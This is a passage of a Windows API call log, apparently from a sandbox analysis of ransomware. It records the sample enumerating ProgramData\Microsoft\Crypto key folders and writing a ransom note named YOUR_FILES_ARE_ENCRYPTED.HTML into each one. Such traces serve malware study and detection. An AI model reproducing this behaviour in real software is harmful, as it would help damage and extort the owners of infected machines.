[0106.077] GetProcessHeap () returned 0x600000 [0106.077] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30d81a8 | out: hHeap=0x600000) returned 1 [0106.078] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName="WindowsAIK", cAlternateFileName="WINDOW~1")) returned 0 [0106.078] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0106.078] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 72 [0106.078] GetProcessHeap () returned 0x600000 [0106.078] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.079] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\pcpksp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0106.079] WriteFile (in: hFile=0x304, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.080] CloseHandle (hObject=0x304) returned 1 [0106.102] GetProcessHeap () returned 0x600000 [0106.102] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.102] GetProcessHeap () returned 0x600000 [0106.102] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0106.103] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc4a8a1, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="RSA", cAlternateFileName="")) returned 1 [0106.103] StrStrIW (lpFirst="RSA", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.103] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA") returned 39 [0106.103] GetProcessHeap () returned 0x600000 [0106.104] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0106.105] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA" [0106.105] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*" [0106.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc4a8a1, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0106.106] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc4a8a1, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 1 [0106.106] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0106.106] StrStrIW (lpFirst="MachineKeys", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.106] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys") returned 51 [0106.106] GetProcessHeap () returned 0x600000 [0106.106] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30d81a8 [0106.107] lstrcpyW (in: lpString1=0x30d81a8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys" [0106.107] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*" [0106.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x626978 [0106.107] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0106.107] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 0 [0106.107] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0106.107] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0106.107] GetProcessHeap () returned 0x600000 [0106.107] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30e81b0 [0106.108] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\machinekeys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0106.108] WriteFile (in: hFile=0x32c, lpBuffer=0x30e81b0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x30e81b0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.110] CloseHandle (hObject=0x32c) returned 1 [0106.111] GetProcessHeap () returned 0x600000 [0106.111] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30e81b0 | out: hHeap=0x600000) returned 1 [0106.111] GetProcessHeap () returned 0x600000 [0106.111] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30d81a8 | out: hHeap=0x600000) returned 1 [0106.112] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc4a8a1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc70b72, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0106.112] StrStrIW (lpFirst="S-1-5-18", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.112] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned 48 [0106.112] GetProcessHeap () returned 0x600000 [0106.112] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30d81a8 [0106.113] lstrcpyW (in: lpString1=0x30d81a8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18" [0106.113] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*" [0106.113] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc4a8a1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc70b72, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x6266b8 [0106.113] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc4a8a1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc70b72, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0106.113] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0xc70b72, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc70b72, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc70b72, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x38, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778", cAlternateFileName="4ECCD1~1")) returned 1 [0106.113] StrStrIW (lpFirst="4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.113] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778") returned 118 [0106.114] PathFindExtensionW (pszPath="4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778") returned="" [0106.114] lstrlenW (lpString="") returned 0 [0106.114] PathFindExtensionW (pszPath="4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778") returned="" [0106.114] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0xc70b72, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc70b72, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc70b72, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x38, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778", cAlternateFileName="4ECCD1~1")) returned 0 [0106.114] FindClose (in: hFindFile=0x6266b8 | out: hFindFile=0x6266b8) returned 1 [0106.114] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 78 [0106.114] GetProcessHeap () returned 0x600000 [0106.114] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30e81b0 [0106.114] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0106.115] WriteFile (in: hFile=0x32c, lpBuffer=0x30e81b0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x30e81b0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.116] CloseHandle (hObject=0x32c) returned 1 [0106.117] GetProcessHeap () returned 0x600000 [0106.117] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30e81b0 | out: hHeap=0x600000) returned 1 [0106.117] GetProcessHeap () returned 0x600000 [0106.117] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30d81a8 | out: hHeap=0x600000) returned 1 [0106.118] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc4a8a1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc70b72, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName="S-1-5-18", cAlternateFileName="")) returned 0 [0106.118] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0106.118] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0106.118] GetProcessHeap () returned 0x600000 [0106.118] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.119] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0106.119] WriteFile (in: hFile=0x304, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.120] CloseHandle (hObject=0x304) returned 1 [0106.121] GetProcessHeap () returned 0x600000 [0106.121] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.121] GetProcessHeap () returned 0x600000 [0106.121] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0106.123] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="SystemKeys", cAlternateFileName="SYSTEM~1")) returned 1 [0106.123] StrStrIW (lpFirst="SystemKeys", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.123] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys") returned 46 [0106.123] GetProcessHeap () returned 0x600000 [0106.123] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0106.124] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys" [0106.124] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\*" [0106.124] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0106.125] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 1 [0106.125] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName="1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778", cAlternateFileName="1FD8A8~1")) returned 1 [0106.125] StrStrIW (lpFirst="1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.125] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778") returned 116 [0106.125] PathFindExtensionW (pszPath="1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778") returned="" [0106.125] lstrlenW (lpString="") returned 0 [0106.125] PathFindExtensionW (pszPath="1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778") returned="" [0106.125] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0x628c48, dwReserved1=0xe87ea9, cFileName="1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778", cAlternateFileName="1FD8A8~1")) returned 0 [0106.125] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0106.125] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0106.125] GetProcessHeap () returned 0x600000 [0106.125] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.126] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\systemkeys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0106.128] WriteFile (in: hFile=0x304, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.129] CloseHandle (hObject=0x304) returned 1 [0106.130] GetProcessHeap () returned 0x600000 [0106.130] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.130] GetProcessHeap () returned 0x600000 [0106.130] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0106.131] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="SystemKeys", cAlternateFileName="SYSTEM~1")) returned 0 [0106.131] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.131] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0106.131] GetProcessHeap () returned 0x600000 [0106.131] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.132] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.133] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0106.134] CloseHandle (hObject=0x314) returned 1 [0106.135] GetProcessHeap () returned 0x600000 [0106.135] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.135] GetProcessHeap () returned 0x600000 [0106.135] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0106.149] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: 